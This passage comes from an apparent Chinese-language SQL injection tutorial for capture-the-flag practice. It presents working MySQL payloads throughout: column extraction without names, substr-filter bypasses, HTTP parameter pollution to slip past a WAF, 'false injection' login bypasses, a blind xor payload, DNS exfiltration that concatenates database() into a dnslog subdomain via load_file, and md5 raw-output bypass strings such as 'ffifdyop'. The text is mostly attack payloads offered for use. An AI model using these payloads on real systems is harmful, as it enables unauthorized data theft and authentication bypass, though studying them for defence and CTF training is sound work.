如图,我们的列名被替换为了对应的数字。也就是说,我们可以继续数字来对应列,如 3 对应了表里面的 password,进而我们就可以构造这样的查询语句来查询password:
select `3` from (select 1,2,3 union select * from users)a; |
当然,多数情况下,反引号会被过滤。当反引号不能使用的时候,可以使用别名来代替:
select b from (select 1,2,3 as b union select * from admin)a; |
join
我们可以利用爆错,借助join和using爆出列名,id为第一列,username为第二列,可以逐个爆出,爆出全部列名之后即可得到列内数据。
过滤其他关键字绕过
过滤 if 语句绕过
如果过滤了 if 关键字的话,我们可以使用case when语句绕过:
if(condition,1,0) <=> case when condition then 1 else 0 end |
下面的if语句和case when语句是等效的:
0' or if((ascii(substr((select database()),1,1))>97),1,0)# |
过滤 substr 绕过
使用 lpad/lpad
使用lpad()和rpad()绕过substr()select lpad((select database()),1,1) // s
select lpad((select database()),2,1) // se
select lpad((select database()),3,1) // sec
select lpad((select database()),4,1) // secu
select lpad((select database()),5,1) // secur
select lpad((select database()),6,1) // securi
select lpad((select database()),7,1) // securit
select lpad((select database()),8,1) // security
select rpad((select database()),1,1) // s
select rpad((select database()),2,1) // se
select rpad((select database()),3,1) // sec
select rpad((select database()),4,1) // secu
select rpad((select database()),5,1) // secur
select rpad((select database()),6,1) // securi
select rpad((select database()),7,1) // securit
select rpad((select database()),8,1) // securitylpad:函数语法:lpad(str1,length,str2)。其中str1是第一个字符串,length是结果字符串的长度,str2是一个填充字符串。如果str1的长度没有length那么长,则使用str2填充;如果str1的长度大于length,则截断。
rpad:同理使用left()绕过substr()
select left((select database()),1) // s
select left((select database()),2) // se
select left((select database()),3) // sec
select left((select database()),4) // secu
select left((select database()),5) // secur
select left((select database()),6) // securi
select left((select database()),7) // securit
select left((select database()),8) // security使用mid()绕过substr()
mid()函数的使用就和substr()函数一样了:
select mid((select database()),1,1) // s |
还可以使用下面这个神奇的东西绕过
select insert(insert((select database()),1,0,space(0)),2,222,space(0)); // s
select insert(insert((select database()),1,1,space(0)),2,222,space(0)); // e
select insert(insert((select database()),1,2,space(0)),2,222,space(0)); // c
select insert(insert((select database()),1,3,space(0)),2,222,space(0)); // u
select insert(insert((select database()),1,4,space(0)),2,222,space(0)); // r
select insert(insert((select database()),1,5,space(0)),2,222,space(0)); // i
select insert(insert((select database()),1,6,space(0)),2,222,space(0)); // t
......INSERT( string , position , number , string2 )
INSERT()函数在指定位置的字符串中插入一个字符串,并插入一定数量的字符。
HTTP参数污染(HPP)漏洞绕过 Waf
HPP是HTTP Parameter Pollution的缩写,意为HTTP参数污染。浏览器在跟服务器进行交互的过程中,浏览器往往会在GET或POST请求里面带上参数,这些参数会以 键-值 对的形势出现,通常在一个请求中,同样名称的参数只会出现一次。
但是在HTTP协议中是允许同样名称的参数出现多次的。比如下面这个链接:http://www.baidu.com?name=aa&name=bb,针对同样名称的参数出现多次的情况,不同的服务器的处理方式会不一样。有的服务器是取第一个参数,也就是 name=aa。有的服务器是取第二个参数,也就是 name=bb。有的服务器两个参数都取,也就是 name=aa,bb。这种特性在绕过一些服务器端的逻辑判断时,非常有用。
HPP漏洞,与Web服务器环境、服务端使用的脚本有关。如下是不同类型的Web服务器对于出现多个参数时的选择:
表头Web 服务器 | 参数获取函数 | 获取到的参数 |
---|---|---|
PHP/Apache | $_GET[‘a’] | Last |
JSP/Tomcat | Request.getParameter(‘a’) | First |
Perl(CGI)/Apache | Param(‘a’) | First |
Python/Apache | getvalue(‘a’) | All |
ASP/IIS | Request.QueryString(‘a’) | All |
假设服务器端有两个部分:第一部分是Tomcat为引擎的JSP/Tomcat型服务器,第二部分是Apache为引擎的PHP/Apache型服务器。第一部分的JSP/Tomcat服务器处做数据过滤和处理,功能类似为一个WAF,而真正提供Web服务的是PHP/Apache服务器。那么服务端的工作流程为:客户端访问服务器,能直接访问到JSP/Tomcat服务器,然后JSP/Tomcat服务器再向PHP/Apache服务器请求数据。数据返回路径则相反。
那么此时我们便可以利用不同服务器解析参数的位置不同绕过WAF的检测。来看看如下请求:
index.jsp?id=1&id=2 |
客户端请求首先过JSP/Tomcat服务器,JSP/Tomcat服务器解析第一个参数,接下来JSP/Tomcat服务器去请求PHP/Apache服务器,PHP/Apache服务器解析最后一个参数。假设JSP/Tomcat服务器作为Waf对第一个参数进行检测,那我们便可以在第二个参数中传payload来绕过Waf。如下所示:
/index.jsp?id=1&id=-1' union select 1,database(),3--+ |
这样 Waf 可能只检测第一个参数 id=1,而PHP脚本真正识别的是 id=select database()–+
[例题]Sql-Labs Less-29
False 注入绕过
False 注入原理
前面我们学过的注入都是基于1=1这样比较的普通注入,下面来说一说 False 注入,利用 False 我们可以绕过一些特定的 WAF 以及一些未来不确定的因素。
首先我们来看一看下面这个sql查询语句:
select * from user where uesrname = 0; |
为什么 username = 0 会导致返回数据,而且是全部数据呢?
这就是一个基于 False 注入的例子,下面再举一个例子:
select * from user where username = 0; |
和上面是同一个表,但是为什么这里只返回了两组数据呢?说到这里不得不说一说有关于 MYSQL 的隐式类型转换。
MYSQL 的隐式类型转换,即当字符串和数字比较时,会把字符串转为浮点数,而字符串转换为浮点数很明显会转换失败,这时就会产生一个warning,转换的结果为0,然后0 = 0 返回的是 True ,这样就将表中的数据全部返回了。但如果字符串开头是数字话还是会从数字部分截断,转换为数字进行比较,在第二个例子中,passwd 字段中有一个值是以数字1开头的并非为0,再进行 passwd = 0 比较时,会从1开始截断,1 = 0 不成立,当然就只返回两条数据了。这就是 MYSQL False 注入的原理。
False 注入利用
下面我们讲讲 False 注入如何利用,及如何构造 False 注入的利用点。在实际中我们接触到的语句都是带有引号的,如下:
select * from user where username ='.$username.'; |
在这种情况下,我们如何绕过引号构造出 0 这个值呢,我们需要做一些处理来构造false注入的利用点?
可以使用的姿势有很多,比如下面的算数运算:
利用算数运算
加:+
插入'+', 拼接的语句: select * from user where username =''+'';
减:-
插入'-', 拼接的语句: select * from user where username =''-'';
乘:*
插入'*', 拼接的语句: select * from user where username =''*''; |
除:/
插入'/6#, 拼接的语句: select * from user where username =''/6#'; |
取余:%
插入'%1#, 拼接的语句: select * from user where username =''%1#'; |
利用位操作运算
我们还可以使用当字符串和数字运算的时候类型转换的问题进行利用。
和运算:&
插入'&0#, 拼接的语句: select * from user where username =''&0#';
或运算:|
插入'|0#, 拼接的语句: select * from user where username =''|0#'; |
异或运算:^
插入'^0#, 拼接的语句: select * from user where username =''^0#'; |
移位操作:
插入'<<0# 或 '>>0#, 拼接的语句: |
利用比较运算符
安全等于:<=>
'=0<=>1# 拼接的语句:where username=''=0<=>1#'
不等于<>(!=)
'=0<>0# 拼接的语句:where username=''=0<>0#' |
大小于>或<
'>-1# 拼接的语句:where username=''>-1# |
其他
+1 is not null# 'in(-1,1)# 'not in(1,0)# 'like 1# 'REGEXP 1# 'BETWEEN 1 AND 1# 'div 1# 'xor 1# '=round(0,1)='1 '<>ifnull(1,2)='1
综合利用
false注入这种注入方式有的优势就是,在某些特定时候可以绕过WAF或者是一些其他的绕过。
这里举例一道题
<?php |
我们注意到filter()函数
$filter = "/ |*|#|;|,|is|union|like|regexp|for|and|or|file|--|||`|&|".urldecode('%09')."|".urldecode("%0a")."|".urldecode("%0b")."|".urldecode('%0c')."|".urldecode('%0d')."|".urldecode('%a0')."/i"; |
这里看起来过滤的比较多,其中and,or还有&,|都被过滤了,这个时候就可以利用false进行盲注。
可以在show函数利用查询的时候注入,
username = "admin'^!(mid((passwd)from(-{pos}))='{passwd}')='1" |
这里官方给出的就是利用异或,其实这里并不需要 admin 只要是一串字符串就可以
异或会使字符串都转为浮点型,都变为了0,由于0=0^0 -> 1^0 -> 1 当然对于这个题并不一定利用这个,直接截取字符串作比较就可以,但是这里只是提供一种姿势,由于mysql的灵活,其花样也比较多还有就是构造的payload比较简短,例如’+’、’^’、’/4#’ 这样只有三个字符便可以绕过登录,简单粗暴,还有就是类似的文章不多,许多开发人员容易忽视这些细节。
盲注脚本
import requests |
DNS注入
原理
通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。
在无法直接利用的情况下,但是可以通过DNS请求,通过DNSlog,把数据外带,用DNS解析记录查看。
LOAD_FILE() 读取文件的函数
读取文件并返回文件内容为字符串。
要使用此函数,文件必须位于服务器主机上,必须指定完整路径的文件,而且必须有FILE权限。该文件所有字节可读,但文件内容必须小于max_allowed_packet(限制server接受的数据包大小函数,默认1MB)。 如果该文件不存在或无法读取,因为前面的条件之一不满足,函数返回 NULL。
注:这个功能不是默认开启的,需要在mysql配置文件加一句 secure_file_priv=
DNSLOG平台:
https://dns.xn--9tr.com/
UNC路径
UNC路径通用命名规则,也称通用命名规范、通用命名约定,类似\softer这样的形式的网络路径。
UNC路径的 格式 :\server\sharename\directory\filename
等同于SELECT LOAD_FILE(‘//库名.1806dl.dnslog.cn/abc’
去访问 库名.1806dl.dnslog.cn 的服务器下的共享文件夹abc。
然后1806dl.dnslog.cn的子域名的解析都是在某台服务器,然后他记录下来了有人请求访问了error.1806dl.dnslog.cn,然后在DnsLog这个平台上面显示出来了
payload示例:
?id=1 and load_file(concat('//', database(),'.htleyd.dnslog.cn/abc')) |
‘“.md5($pass,true).”‘ 登录绕过
很多站点为了安全都会利用这样的语句:
SELECT * FROM users WHERE password = '.md5($password,true).'; |
md5(string,true) 函数在指定了true的时候,是返回的原始 16 字符二进制格式,也就是说会返回这样子的字符串:’or’6\xc9]\x99\xe9!r,\xf9\xedb\x1c:
这不是普通的二进制字符串,而是 ‘or’6\xc9]\x99\xe9!r,\xf9\xedb\x1c 这种,这样的话就会和前面的形成闭合,构成万能密码。
SELECT * FROM users WHERE password = ''or'6.......' |
但是我们思考一下为什么 6\xc9]\x99\xe9!r,\xf9\xedb\x1c 的布尔值是true呢?
在mysql里面,在用作布尔型判断时,以1开头的字符串会被当做整型数(这类似于PHP的弱类型)。要注意的是这种情况是必须要有单引号括起来的,比如 password=‘xxx’ or ‘1xxxxxxxxx’,那么就相当于password=‘xxx’ or 1 ,也就相当于 password=‘xxx’ or true,所以返回值就是true。这里不只是1开头,只要是数字开头都是可以的。当然如果只有数字的话,就不需要单引号,比如 password=‘xxx’ or 1,那么返回值也是 true。(xxx指代任意字符)
接下来就是找到这样子的字符串,这里给出两个吧。
ffifdyop:
content: ffifdyop |
129581926211651571912466741651878684928:
content: 129581926211651571912466741651878684928 |